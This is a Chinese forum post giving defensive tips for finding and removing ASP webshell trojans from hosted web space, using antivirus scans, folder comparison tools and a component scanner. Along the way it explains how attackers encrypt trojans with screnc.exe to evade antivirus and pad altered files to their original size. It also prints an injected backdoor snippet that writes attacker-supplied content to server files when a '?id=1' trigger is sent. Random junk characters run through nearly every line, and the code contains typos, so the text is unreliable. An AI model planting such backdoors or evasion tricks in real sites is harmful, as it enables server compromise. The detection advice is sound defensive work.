TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 4 E# D5 `" o f( `
6 J! X" A+ ?3 J e8 {7 \通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 / ]! d) j; s% V! p7 q& E9 _
7 E& A- j7 a/ V2 X8 X一.技巧1:杀毒软件查杀 % Y$ _, H6 n5 u- E( l6 b5 |$ F0 N
! }/ C8 @: d/ b% A0 D
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 7 y# k* ~; \ c$ W7 b
. k4 c2 l3 n; j. w6 l6 i9 {
利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
1 Q; R8 r2 s* L+ j- `% w$ R& s7 ~5 k( W) l. q9 ]" D
二.技巧2:FTP客户端对比 ( Q7 e: o+ H# E! B9 D
$ X* x* I7 h* t( W2 N/ K
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: 5 r+ X) y" c' ?
3 D" V' x% K0 t4 v3 C/ ~screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 ) r7 H {9 `7 c4 H% ]% `* B
& {! a ]% n1 M) ^经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 - ?& F# g7 d; n2 e' F
2 S6 M! I" e5 h; H+ a( O等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
( m# ~8 A' k c/ E( N/ `9 r A' e5 \- z4 J) g
盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
% o/ r* K; U1 K
H' e) ^# J+ ^7 H所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
0 T8 V/ \6 T( [1 Q- @- o: B
& H. l r5 g% \& w/ P' H' p这里以FlashFXP进行操作讲解。 j( B! `( E8 s
* ~+ h4 x3 N" m步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
( Z* a: I! Y+ g u2 Z5 ~' c! K$ y
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。
0 Q- L+ u1 y; K9 ?( r+ W* H/ o; P' ?! h1 F# ?3 ]* Y# S
我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。 ; h3 h3 i: S' R
三.技巧3:用Beyond Compare 2进行对比 6 E+ h! a% F. e& p* q H& L
; {. ?5 G9 \, g1 ?1 R0 W5 W上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: 1 A3 a4 _& [$ H6 ^) H( n% R. q
2 V+ q6 T' X! g〈% , w7 R5 M5 u4 Y/ q3 u5 A2 v* ^9 f
. }1 j9 F1 x) R: s& j3 f2 ]9 ^on error resume next
; Y( C7 s% W4 y: p( p
8 R. s# Q7 C2 m0 s# jid=request("id") * x) V2 F& E: J6 R V' Q+ \% _4 j
+ D7 u" t' _" C6 [1 I4 G* l
if request("id")=1 then
% |% j% t: ]+ [, P; r; y
/ I$ n$ P/ z! Rtestfile=Request.form("name")
' J C1 n( L: P" ^2 b: h0 z" m' d; `' {$ N( c2 Q
msg=Request.form("message") ; P/ G- a- l. ?! Y% W! ]
1 L4 \9 m9 s, v9 B' Y( H( [set fs=server.CreatObject("scripting.filesystemobject") . g% _9 k1 U4 [" x7 G2 E3 i* W
4 B2 u+ Y7 E% N! Oset thisfile=fs.openTestFile(testfile,8,True,0)
3 B* F2 E8 y1 X/ I8 n( U9 p/ e6 D7 p8 z$ |; ]$ y2 |
thisfile.Writeline(""&msg&"") 6 j1 H; y5 s! U* Y" x
: f! b$ W1 b l) o! B
thisfile.close
& M3 D7 U" d! j2 B& {2 V# }& C- R, ]# K: b: n. Z& N8 I
set fs=nothing % D& \3 Q& E H* L+ v* S$ L
4 y2 } }( o8 B: ~% Z%〉
0 I8 W+ |- x9 O2 [6 V! o0 A. ~! s9 ]/ n- J- V
〈from method="post" Action="保存"?id=1〉 . H6 _' s, D* [" O
) q& N& z: Y# d. w5 p1 `% m/ c
〈input type="text" size="20" name="Name"
F* L+ L: v0 |2 U$ I
: \8 s! f) o; J# u9 TValue=〈%=server.mappath("XP.ASP")%〉〉 ' N X5 u! `( @) ]5 H S4 @
' i" | s3 H3 {2 A/ D/ x1 W〈textarea name="Message" class=input〉
5 R5 V) U9 ]6 J6 @2 Z/ a1 t) ^0 |6 d, H9 @+ ^, }
9 [1 ~$ s5 I6 Q8 T- e; L〈/textarea〉 ( y2 O/ l0 L" z( ?. h
, y5 X+ Q4 {7 ?# D: U- s
〈input type="Submit" name="send" Value="生成"
5 C- y1 z4 T6 T& ?4 m/ g7 i3 U1 d0 W& h6 z+ z5 N
class=input〉 ( S! h0 h. _0 s( n8 M4 O. \. A
" l( M' P3 c2 H1 B' U
〈/from〉 ! V! B+ H. z& d6 W& @ @- y d& g
7 O9 }, K/ K" ~4 J8 B: Q〈%end if%〉 * C3 M- X# ?; @% i2 ]) j1 g
8 _0 l2 [2 _4 d; p! F注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。 # a4 _+ `3 b& }2 r4 M* I7 ]
! i) U: B0 D7 k9 Z" d
假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
/ \& n2 J; d9 L" N' E! m6 L: X% ]3 K0 L3 z7 n
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 + Q% u1 b x4 a
- M" ?+ c' ~; |Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
! D1 A+ C/ p5 B1 b4 K
+ x3 m: y: [) U* F看我来利用它完成渗透性asp木马的查找。
" U! |8 J/ j% V8 J \" \7 U0 b
. O3 F/ h- K! u1 `步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。 : G" w" Z% B- ~* ?+ y7 P! A6 ?' N
# c4 D' i* M$ c/ T9 P; B步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 / j+ W# _; O4 H' a! T+ }
/ a* {0 S9 | u0 G% D6 N8 j步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
' Q! z+ D2 l" ]5 G$ I0 F' B: `7 Z
9 @# `6 V& y6 A7 m1 i- H
四.技巧4:利用组件性能找asp木马
: E# s+ t. T7 h! f: |) s
; v$ ]% v; N2 \上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
2 b% }2 m. O z' E$ _3 x$ p3 w' I7 K S0 H
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。
7 w: X3 M( o- a3 D
$ N! `5 ~5 ?) ]7 J它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 8 ]# n6 M0 i( Q' ~) X. C2 K/ y9 a$ {. _
& A* {' l& k9 t5 B( Y, ~: r
使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
9 }5 x2 h+ S( \, f4 e% g, i4 ]' i5 Y8 M- d$ J6 X
一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。
8 ^' g+ l4 P3 T6 M+ i* K5 G) K
5 E0 t j1 r, A大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主